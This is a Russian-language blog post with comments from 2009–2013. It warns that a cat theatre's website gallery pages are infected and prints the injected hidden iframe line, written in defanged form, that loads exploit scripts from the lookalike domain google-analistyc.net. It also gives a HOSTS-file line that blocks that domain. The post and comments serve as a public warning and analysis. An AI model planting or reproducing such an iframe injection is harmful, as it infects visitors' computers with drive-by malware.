Войти в систему

Home
    - Создать дневник
    - Написать в дневник
       - Подробный режим

LJ.Rossia.org
    - Новости сайта
    - Общие настройки
    - Sitemap
    - Оплата
    - ljr-fif

Редактировать...
    - Настройки
    - Список друзей
    - Дневник
    - Картинки
    - Пароль
    - Вид дневника

Сообщества

Настроить S2

Помощь
    - Забыли пароль?
    - FAQ
    - Тех. поддержка



Пишет pe3yc ([info]pe3yc)
@ 2009-12-05 00:00:00


Previous Entry  Add to memories!  Tell a Friend!  Next Entry
ЧБСХ, сайт кошачьего театра заражен довольно мерзкими вирусами, что и было сейчас обнаружено моим замечательным лицензионным Авастом (да, да, это product placement).

На входной странице галереи их ещё нет, но не рекомендую заходить в сами галереи, если не уверены в своём антивирусе:
------------------------------------------------------------
http://www.kuklachev.ru/gallery/yuriy_kuklachev/
http://www.kuklachev.ru/gallery/dmitriy_kuklachev/
http://www.kuklachev.ru/gallery/archive/
http://www.kuklachev.ru/gallery/afisha/
http://www.kuklachev.ru/gallery/press/
http://www.kuklachev.ru/gallery/video/
http://www.kuklachev.ru/gallery/queen_of_cats/
http://www.kuklachev.ru/gallery/cats/
http://www.kuklachev.ru/gallery/boris/
http://www.kuklachev.ru/gallery/ice_fantasy/
------------------------------------------------------------

Ну, или сначала внесите в файл /WINDOWS/SYSTEM32/DRIVERS/ETC/HOSTS строчку:

127.0.0.1 google-analistyc.net

и обязательно перегрузите браузер, а потом уже заходить можно.

Это довольно примитивный, но неприятный айфреймовый ворм, который запускает скрипты с этого самого google-analistyc.net - выглядит этот код очень просто, одной строчкой:

[ifrаmе srс="httр://gооglе-аnаlistyс.nеt/in.сgi?12" width="0" hеight="0" stylе="displаy:nоnе"][/ifrаmе]

(Угловые скобки заменены на квадратные и некоторые символы на кириллические во избежание случайного заражения).

Скрипт по этому адресу содержит целый букет троянов и эксплойтов. Если вы не специалист, рекомендую туда не лезть, а то ещё запустите этот скрипт, подсадите себе руткит, а мне карму отмывать.

Одно из двух - либо это обычное распиздяйство и неквалифицированность администратора сайта, либо часть объявленного клоунами плана по упромысливанию интернета. Во втором случае конспирология учит нас, что ддосят тифаретник именно с зараженных этим эксплойтом компьютеров. Даже не знаю, какая версия интереснее..

Update: Нас всё-таки читают, что приятно. Хост gооglе-аnаlistyс.nеt уже не резолвится, слава яйцам. Упаковка вируса на сайте осталась, но его наполнение на данный момент неактивно. Впрочем, поскольку дыра никуда не делась, контейнер снова может быть активирован в любой момент - пока админы сайта не почешутся вычистить заразу, сменить пароли доступа и не начнут соблюдать веб-гигиену, опасность продолжает нависать.

Вы как хотите, а я склоняюсь к версии, что это простое, но злостное распиздяйство. Думаю, что если эта пакость там сидит давно, то количество зараженных компьютеров вполне могло быть значительным. Люди, которые ходят на сайт кошачьего театра, вряд ли слишком умудрены в компьютерных науках и вряд ли тщательно следят за кибербезопасностью. Вполне могли нахвататься руткитов и эксплойтов.

Update 11/12/2009: Хост gооglе-аnаlistyс.nеt снова резолвится и содержит активное вирусное наполнение. Будьте осторожны.


(Добавить комментарий)


[info]sashnik@lj
2009-12-04 18:37 (ссылка)
йопт
http://google.com/safebrowsing/diagnostic?site=google-analistyc.net/
какие-то зловредные крякеры инжектировали туда дрищ.
"если бы я был конспирологом", то сказал бы, что именно таким образом были озомбированы массы машинок, которые сейчас ддосят уютный тифаретник.

(Ответить) (Ветвь дискуссии)


[info]pe3yc@lj
2009-12-04 18:42 (ссылка)
Про этот хост много интересного (http://www.google.ru/search?hl=ru&newwindow=1&q=%22google-analistyc.net%22&lr=&aq=f&oq =) есть..

(Ответить) (Уровень выше) (Ветвь дискуссии)


[info]mosomedve@lj
2009-12-04 19:11 (ссылка)
а на эту ссылку не опасно нажимать?

(Ответить) (Уровень выше) (Ветвь дискуссии)


[info]pe3yc@lj
2009-12-04 19:16 (ссылка)
На эту не опасно.

(Ответить) (Уровень выше)


[info]pe3yc@lj
2009-12-04 18:47 (ссылка)
Не инжектировали, - этот хост и создавался как хранилище эксплойтов.

(Ответить) (Уровень выше) (Ветвь дискуссии)


[info]sashnik@lj
2009-12-04 19:10 (ссылка)
Именно это я и имел в виду под упромысливанием. Сейчас апдейтну.
Подозреваю не распиздяйство администраторов, а злой умысел, который можно "распиздяством" потом отмазать.

Не инжектировали, - этот хост и создавался как хранилище эксплойтов.
К живодёру в галерею инжектировали код, который подгружает iframe-дрищ со зловредного сайта.

(Ответить) (Уровень выше) (Ветвь дискуссии)


[info]pe3yc@lj
2009-12-04 19:18 (ссылка)
А, в этом смысле да.

Я к тому, что анал-истик этот - изначально под эксплойты и предназанчен. ЧБСХ, хост этот никаким хуизом не идентифицируется, все регистрары на голубом глазу отвечают "нот фаунд". Хитровыетый с капустой, ёпт..

(Ответить) (Уровень выше) (Ветвь дискуссии)


[info]sashnik@lj
2009-12-04 19:32 (ссылка)
registrar у них - известные говноеды enom.com (Enom Inc.)
а сам сайт уже прибили, имя не резолвится.

(Ответить) (Уровень выше) (Ветвь дискуссии)


[info]pe3yc@lj
2009-12-04 19:39 (ссылка)
Это они оперативненько. Час назад вполне себе резолвилось.

(Ответить) (Уровень выше)


[info]pe3yc@lj
2009-12-11 12:14 (ссылка)
Уже снова всё резолвится и код там присутствует. Починились.

(Ответить) (Уровень выше)


[info]andris@lj
2009-12-05 09:29 (ссылка)
[andris@ddos-hpe-01 ~]> whois -H google-analistyc.net

Whois Server Version 2.0

Domain names in the .com and .net domains can now be registered
with many different competing registrars. Go to http://www.internic.net
for detailed information.

Domain Name: GOOGLE-ANALISTYC.NET
Registrar: ENOM666, INC.
Whois Server: whois.enom.com
Referral URL: http://enom.com
Name Server: No nameserver
Status: ok
Updated Date: 02-dec-2009
Creation Date: 02-dec-2009
Expiration Date: 02-dec-2010

>>> Last update of whois database: Sat, 05 Dec 2009 12:24:51 UTC <<<

Всё замечательно видно.

(Ответить) (Уровень выше) (Ветвь дискуссии)


[info]pe3yc@lj
2009-12-05 10:30 (ссылка)
Ага. Только enom.com пишет, что, мол, not found.

(Ответить) (Уровень выше)


[info]idaho_green@lj
2009-12-11 11:12 (ссылка)
http://www.who.is/domain_archive-net/google-analistyc.net/

(Ответить) (Уровень выше) (Ветвь дискуссии)


[info]pe3yc@lj
2009-12-11 12:15 (ссылка)
Ага, теперь снова резолвится. И содержит эксплойты.

(Ответить) (Уровень выше)


[info]dil@lj
2009-12-04 19:39 (ссылка)
че-то я там ничего подобного не вижу. он откуда запускается?

(Ответить) (Ветвь дискуссии)


[info]pe3yc@lj
2009-12-04 19:40 (ссылка)
см. сорц любой галереи
последняя строчка - после закрывающего тэга [/html]

(Ответить) (Уровень выше)


[info]dil@lj
2009-12-04 19:42 (ссылка)
опс.

Reported Attack Site!
This web site at www.kuklachev.ru has been reported as an attack site and has been blocked based on your security preferences.

сказал FF..

(Ответить) (Ветвь дискуссии)


[info]pe3yc@lj
2009-12-04 20:34 (ссылка)
Ужt убрали с DNS-ов, не резолвится их анал-истик. Но упаковка осталась, конечно. На эту скорлупку FF и возбуждается..

(Ответить) (Уровень выше)


[info]pe3yc@lj
2009-12-11 12:28 (ссылка)
Уже снова хост резолвится и код активен. А с сайта театра никто ничего не убрал. Интересное кино.

(Ответить) (Уровень выше)


[info]kif_kr0ker@lj
2009-12-04 21:53 (ссылка)
На днях буквально попалось:

"Сегодня ночью антивирус Avast ебанулся на отличненько, обновил базы и решил, что The Bat на домашнем компе это страшный троян. Заблокировал, есстесно.
Я расстроился, но не сильно, почитал почту через веб–интерфейс и почапал на работу.
На работе сидит админ с выпученными глазами. Этот сцуко–антивирус посчитал 90% файлов нашей CRM вирусней и тупо все стер. Экзешники, конфиги, DLL–ки. (К слову заметить, этот программый комплекс стоит порядко 15к зелени)"

(Ответить) (Ветвь дискуссии)


[info]pe3yc@lj
2009-12-04 22:20 (ссылка)
Аваст только дал мне сигнал, дальше я уже вручную залез в исходники и посмотрел. Много у кого на этих страницах среагировали и другие защиты - Авира, встроенная защита файрфокса и прочие.

Так что Аваст не виноват. А в вашем случае Аваст ничего не стёр, поскольку самостоятельно ни один антивирь стирать ничего не будет. Стёр наверняка сам админ, когда соответствующим образом ответил на вопрос антивиря "чо делать будем?".

Потому что когда защита срабатывает, надо голову включать, а не жать на все кнопки от ужаса. Бывают и ложные тревоги, конечно. Особенно когда антивирь находит давно уже неопасные пустые скорлупки. Но в девяти случаях из десяти защита верещит по делу..

(Ответить) (Уровень выше) (Ветвь дискуссии)


[info]asc_ii@lj
2009-12-15 05:40 (ссылка)
Бывают и ложные тревоги, конечно
у аваста они чо-то слишком часто бывают
а за зонтиком я ложных срабатываний в моей практике вообще не помню
если, конечно, не считать таковыми ругань на всяческие безобидные кряки ;))

(Ответить) (Уровень выше) (Ветвь дискуссии)


[info]pe3yc@lj
2009-12-15 05:50 (ссылка)
В данном случае он честно среагировал на айфреймовый контейнер, который может быть безобидным только до тех пор, пока не активируют скрипт, который за ним стоит.

(Ответить) (Уровень выше)


[info]abat@lj
2009-12-13 11:28 (ссылка)
если у админа нет бэкапа и на боевом и единственном сервере он жмет без разбору "удалить все", то ему надо не глаза выпученые, а жопу выпотрашеную

(Ответить) (Уровень выше)


[info]ex_kondrati@lj
2009-12-11 13:06 (ссылка)
Приставка от Дрвэба к Файрфоксу промолчала.

Image

Впрочем, ходить по ссылке, чтобы проверить Авиру, желания не возникло.

(Ответить) (Ветвь дискуссии)


[info]pe3yc@lj
2009-12-11 13:42 (ссылка)
Достаточно посмотреть сорц страниц.

(Ответить) (Уровень выше)


[info]pe3yc@lj
2009-12-11 13:43 (ссылка)

(Ответить) (Уровень выше)


[info]varjag_2007@lj
2013-04-26 19:27 (ссылка)
Простите, мне этот пост выскочил по запросу " google-analistyc.net".

У меня вот такая проблема http://varjag-2007.livejournal.com/4610058.html. Что вы можете мне посоветовать?

(Ответить) (Ветвь дискуссии)


[info]pe3yc@lj
2013-04-26 20:33 (ссылка)
Что ж тут непонятного-то.

Хост gооglе-аnаlistyс.nеt не имеет никакого отношения к гуглю и использует только визуальную похожесть своего названия на известный сервис Гугля. На самом деле это хост для динамических вредоносных скриптов, которые могут включаться и выключаться дистанционно держателями ботнетов. Время от времени он бывает активен, скрипты включены и заражают компьютеры пользователей троянами, вирусами или другими вредоносными пакостями. Иногда они неактивны, и тогда антивирусные программы на них не реагируют. Хосты pixelstrack.com, tracevisit.com и mobi-bro.net — из той же серии, только они не маскируются под гугль.

Подсадить к вам в журнал эту пакость могли не только в комментах, но и другими способами, благодаря исключительной криворукости и распиздяйству Сцуппа™, который Сцупп™ вообще забил болт на безопасность жежешечки. Заражаются такими способами не только журналы, но и многие сайты со стандартными движками.

Рекомендую обратиться к дебилам из Сцуппа™ напрямую, а не через их дебильную техподдержку, которая вообще никаких мышей не ловит уже давно. Например, просто в личный журнал [info]igrick@lj. Если он не занят какой-нибудь очередной говножетонной херней, то, возможно, и сможет вам помочь.

(Ответить) (Уровень выше) (Ветвь дискуссии)


[info]varjag_2007@lj
2013-04-26 20:50 (ссылка)
Ага, попробую, спасибо за совет.
Мой знакомы компьютерщик проверил (ту страницу, которая была указана) - там все чисто, я повторно поставила на проверку в веб-яндексе, но там пока не куют и не мелят, зато вот с эти псевдогуглом выскочило. У меня сказали, что даже может быть, что кто-то, как наши националисты в фейсбуке, коллективно одновременно пожаловался. Но как от такой подлянки защититься, тоже н езнаю.

(Ответить) (Уровень выше) (Ветвь дискуссии)


[info]pe3yc@lj
2013-04-26 21:12 (ссылка)
Это не имеет никакого отношения к жалобам.

Не знаю что там проверял ваш компьютерщик, но контейнеры для эксплойтов могут содержать вредоносный код не всё время, а время от времени. Возможно, на момент проверки они и были пустыми, но завтра в них опять будут включены скрипты. А может быть ваш компьютерщик не так уж хорошо и проверял. В любом случае, имеет смысл обратиться к профильным специалистам по IT-безопасности, а не к просто "компьютерщикам".

(Ответить) (Уровень выше) (Ветвь дискуссии)


[info]varjag_2007@lj
2013-04-26 21:28 (ссылка)
Где же я их возьму?
Да и как я могу предупредить размещение, скажем, в рекламных баннерах этих скриптов7

(Ответить) (Уровень выше) (Ветвь дискуссии)


[info]pe3yc@lj
2013-04-27 05:14 (ссылка)
Взять их можно в соцсетях, их там полно.

В рекламных баннерах размещение вы предупредить не можете, но в рекламных баннерах их и нет.

(Ответить) (Уровень выше) (Ветвь дискуссии)


[info]varjag_2007@lj
2013-04-27 09:55 (ссылка)
У меня в ссылках бросали ссылку на пост человека, у которого такая же проблема, и который разбирается в IT-программировании http://varjag-2007.livejournal.com/4603556.html?thread=118089892#t118089892, Он как раз в рекламе обнаружил.

кстати, от Дронова (как и от СУПа) ни ответа, ни привета (((

(Ответить) (Уровень выше) (Ветвь дискуссии)


[info]pe3yc@lj
2013-04-27 10:40 (ссылка)
Баннер это картинка, в картинке никаких троянов не бывает. Трояны и прочий малварь запускаются через скрипты, а вот скриптами на странице ведает только Cцупп™. Ну, теоретически и автор журнала может вставить вредоносный код, хотя умный парсер (если бы он был у Сцуппа™ умным) этого позволять ему не должен.

Таким образом, все дорожки ведут в Сцупп™. Больше некуда.

(Ответить) (Уровень выше) (Ветвь дискуссии)


[info]varjag_2007@lj
2013-04-27 11:04 (ссылка)
Сволота...


Меня мог кто-то "заказать", как пишут вот здесь (http://varjag-2007.livejournal.com/4610058.html?thread=118283530#t118283530), и что в таком случае делать?

Кстати, у меня с СУПом другая проблема. Я с пол-года назад написала статью о платных ботах интернета, через несколько часов пришло письмо от СУП, что зафиксировано, как эта статья подымается специально в рейтинге и зафиксировано вмешательство в работу СУУПа (надо полагать - с моей стороны), и что на время разбирательства меня выкидывают из всех рейтингов. Я несколько раз за эти полгода обращалась и каждый раз енедели через две ответ, мол, на время расследования.... Т.е. меня по умолчанию неизветно за что наказали... А теперь вот это...


Вот за эту статью (http://varjag-2007.livejournal.com/3841371.html).

(Ответить) (Уровень выше) (Ветвь дискуссии)


[info]pe3yc@lj
2013-04-27 11:06 (ссылка)
Нет, это никакой не "заказ", а указанные сайты действительно вредоносные.

(Ответить) (Уровень выше) (Ветвь дискуссии)


[info]varjag_2007@lj
2013-04-27 11:16 (ссылка)
Но ведь у меня нет ссылок на эти сайты.
Эти ссылки могли быть в замеченных мной и удаленных "подозрительных комментах"?

(Ответить) (Уровень выше) (Ветвь дискуссии)


[info]pe3yc@lj
2013-04-27 12:24 (ссылка)
Сейчас нет, а вот в момент сообщения — вполне могли быть. Хосты предоставляют контейнеры, а содержимое этих контейнеров может меняться в любой момент по управляющей команде. Когда шухер — контейнеры пусты, а когда шухер уляжется, малварь снова в действии.

Скрипты могли быть в комментах, но это маловероятно, поскольку система ЖЖ юзерские посты и комментарии парсит, туда что попало не запихнёшь. Но поскольку руки у сцупповских кривые, то и парсить оно могло не особенно.

Но гораздо более вероятно, что зараза проникла не через юзерские комменты, а через сам сервер ЖЖ. Это тоже следствие сцупповских кривых рук, но просто это более традиционный для таких эксплойтов путь заражения.

Судя по количеству разнообразных рюшечек, счетчичков, рейтингочков и прочих примочечек в вашем журнале, способов навесить вам какой-нибудь малварь существует множество, и какой из них сработал в этот раз, выяснить будет непросто. Пусть этим занимаются профильные специалисты. А вам я советую прекратить заниматься красочным сцуппоблоггерством и привести журнал в нормальный внятный вид, тогда и шансов навесить вам троянов будет гораздо меньше.

Вы, надеюсь, в реальной жизни же не носите рагульские кофточки с люрексом и тигровые тайцы? Вот и в блоге не надо, ни к чему хорошему это не приведёт.

(Ответить) (Уровень выше) (Ветвь дискуссии)


[info]varjag_2007@lj
2013-04-27 12:40 (ссылка)
Я ношу одежду спортивного стиля или унисекс и обувь типа мокасин на низкойй танкетке.
Поиск по блогу - удобная вещь хотя бы для себя, а остальное, как внушали мастера яндеква - удобные прибаббасы?

(Ответить) (Уровень выше) (Ветвь дискуссии)


[info]pe3yc@lj
2013-04-27 12:55 (ссылка)
Какие прибамбасы? Вы посмотрите на свою колонку справа. Это помойка натуральная.

(Ответить) (Уровень выше)


[info]varjag_2007@lj
2013-04-27 12:42 (ссылка)
Кстати, Мозилла снова не пускает меня в журнал. То ли это уже в самой Мозилле мой адрес - в числе неблагонадежных сайтов (((

(Ответить) (Уровень выше) (Ветвь дискуссии)


[info]pe3yc@lj
2013-04-27 12:56 (ссылка)
Проблема, повторяю, не в мозилле.

(Ответить) (Уровень выше)